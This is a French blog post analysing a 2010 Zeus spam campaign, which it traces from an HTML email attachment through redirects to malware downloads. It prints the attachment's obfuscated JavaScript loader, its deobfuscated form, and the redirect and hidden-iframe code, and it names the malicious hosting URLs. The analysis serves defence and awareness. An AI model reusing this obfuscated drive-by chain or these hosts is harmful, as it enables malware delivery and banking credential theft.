September 2010 Archives

20-09-2010 23:15:13

[Secu] Analyse d'une tentative d'infection Zeus

Un spam arrive dans ma boite au lettre, l'occasion de faire une petite analyse des virus à la mode.

Le spam est très simple. La demande d'ouvrir la pièce jointe.
---------------------------- Message original 
----------------------------
Objet:   PDF of JS article
De:      "Maude Gorman" 
Date:    Lun 20 septembre 2010 21:21
--------------------------------------------------------------------------

see attached.

-V


60488Journal Sentinel - Leka Obit.html
Le mail est accompagné d'une simple page HTML. On désactive le Javascript sur notre navigateur et on ouvre la page pour voir ce qu'elle contient. On trouve le script suivant :
<script language="JavaScript" type="text/javascript">function 
aavk(u4zc){var
fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t 
hr<",xtur=tkql.length;eval(unescape("%66un%63ti%6Fn 
s%30k9%28uy%73e){%71sv%32+=%75yse%7D"));for(fwag=0;fwag<u4zc.length;fwag++){cxzm=u4zc.charAt(fwag);xsln=tkql.indexOf(cxzm);if(xsln>-1){xsln-=(fwag+1)%xtur;if(xsln<0){xsln+=xtur;}s0k9(tkql.charAt(xsln));}else{s0k9(cxzm);}}eval(unescape("%64oc%75me%6Et.w%72it%65(q%73v2)%3Bqs%762=%22%22;"));}aavk(":aa<tsx\"xsh<.ptc0fe>bai 
p<v>ln =u<.c/ceut;iciue;ssqaffo=l\"qif 
b.mi;nxrtochp");</script><noscript>To display this page you 
need a browser that supports JavaScript.</noscript>
Comme on le voit, le code est légèrement obfusqué mais rien de méchant. En le déchiffrant et en ajoutant l'indentation adéquate, on obtient ceci :
<script>
function aavk(u4zc){
	var fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t 
hr<",xtur=tkql.length;
	function s0k9(uyse){
		qsv2+=uyse
	}
		for(fwag=0;fwag<u4zc.length;fwag++){
			cxzm=u4zc.charAt(fwag);
			xsln=tkql.indexOf(cxzm);
			if(xsln>-1){
				xsln-=(fwag+1)%xtur;
				if(xsln<0){
					xsln+=xtur;
				}
				s0k9(tkql.charAt(xsln));
			}
			else{
				s0k9(cxzm);
			}
		}
		document.write(qsv2);
		qsv2="";
	}
aavk(":aa<tsx\"xsh<.ptc0fe>bai p<v>ln 
=u<.c/ceut;iciue;ssqaffo=l\"qif b.mi;nxrtochp");
</script><noscript>To display this page you need a browser 
that supports JavaScript.</noscript>
On a donc une fonction principale incluant une autre fonction et transformant la chaine entrée en input pour au final afficher du code.

On va modifier le document.write par un alert pour voir le code généré. On obtient :
<meta http-equiv="refresh" 
content="0;url=http://barrhavenbia.ca/x.html" />
On est donc redirigé vers un 1er site : http://barrhavenbia.ca/x.html . Cette page contient ensuite le code suivant :
PLEASE WAITING.... 4 SECONDS
<iframe width="0" height="0" 
src="http://finwizonline.com/news/"></iframe>
<meta http-equiv="refresh" 
content="4;url=http://xxxvideo-eyyc.cz.cc/video7/?afid=24" />
Nous avons une 1ere iframe redirigeant vers une page sans texte (http://finwizonline.com/news/), puis au bout de 4s nous sommes redirigés vers http://xxxvideo-eyyc.cz.cc/video7/?afid=24.
En recherchant le domaine finwizonline.com sur google, on constate des résultats du jour meme ( https://zeustracker.abuse.ch/monitor.php?host=finwizonline.com&id=26fdd84b6f338f7f5372780bbe234546 nous indiquant qu'un virus Zeus se trouve dans le fichier /news/exe.exe . En récupérant l'exe et en l'envoyant à virustotal, on obtient l'analyse suivante : http://www.virustotal.com/file-scan/report.htm Seuls 7 antivirus détecte ce virus.

Continuons sur le 2e site : http://xxxvideo-eyyc.cz.cc/video7/?afid=24
Cette page nous invite à télécharger un codec manquant. En le téléchargeant on obtient un exécutable codec.exe dont l'icone est changé pour passer plus inapercu et paraitre comme un fichier éditable.
L'analyse virustotal est disponible ici : http://www.virustotal.com/file-scan/report.html On constate encore que seuls 20 antivirus détecte l'exe comme un virus. Pour aller plus loin, on constatera que les principaux AV "pro" comme McAfee ou Symantec ne détecte aucun des 2 virus de cette analyse.

L'analyse Anubis est disponible ici : http://anubis.iseclab.org/?action=result&task_id=1e859cad6e0dd1d347513e8a636f15d4d&format=html On voit bien que le malware est dangereux et qu'il va hooker votre MSN et IE pour voler toutes vos infos. Bref cela ressemble également à un virus Zeus packed.

Le vol bancaire semble donc fortement actif et est diffusé via des spam redirigeant vers des exe plutot bien camouflé pour ne pas etre détecté par les antivirus du marché pendant une période suffisante pour que le travail soit rentable. Soyez donc prudent car on voit tres bien ici que votre antivirus ne vous protege en rien du vol d'information et les sécurités fournies par votre banque ne sont pas plus efficaces face à un virus comme Zeus.

Petite remarque : tous les sites ont été fermés le temps de l'analyse donc ce genre de malware semble surveillé.

Posted by cloud | Permanent link | File under: Security